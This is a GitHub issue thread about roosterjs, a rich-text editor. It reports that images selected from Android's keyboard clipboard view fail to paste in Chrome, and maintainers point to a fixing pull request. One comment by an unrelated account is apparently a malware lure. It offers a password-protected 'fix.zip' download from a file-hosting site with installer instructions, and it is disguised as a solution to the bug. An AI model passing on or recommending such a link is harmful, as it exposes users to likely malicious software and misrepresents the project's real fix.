### ISSUE TITLE
Unable to paste images from the clipboard view on Android

### ISSUE THREAD

**Issue by palatter** [microsoft/roosterjs#2776]
**Describe the bug**

Android has a clipboard view that is available from the keyboard. It shows the most recent images that were copied. If you select 1 or more images from this view, it will fail to paste. 

Error: "Chrome does not support image pasting here."

https://github.com/user-attachments/assets/2046a06c-00f1-45e6-b8dc-fec56e97e7b9

You can still paste a single image using a long press to copy an image and then paste an image but this limiting when trying to use multiple images.

**To Reproduce**
1. Copy a number of images
2. Go to https://microsoft.github.io/roosterjs/index.html#format on Android device
3. Open keyboard and select the clipboard
4. Select one or more images
5. Paste
6. See error

**Expected behavior**

**Screenshots**

**Device Information**
 - OS: Android 11 - Pixel 2
 - Browser Chrome

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JiuqingSong** [comment]
Hi @palatter , would you like to submit a fix?

Thanks.

**Comment by JiuqingSong** [comment]
This is supposed to be fixed by https://github.com/microsoft/roosterjs/pull/2863

Feel free to reactivate if it is not fixed. Thanks. @palatter
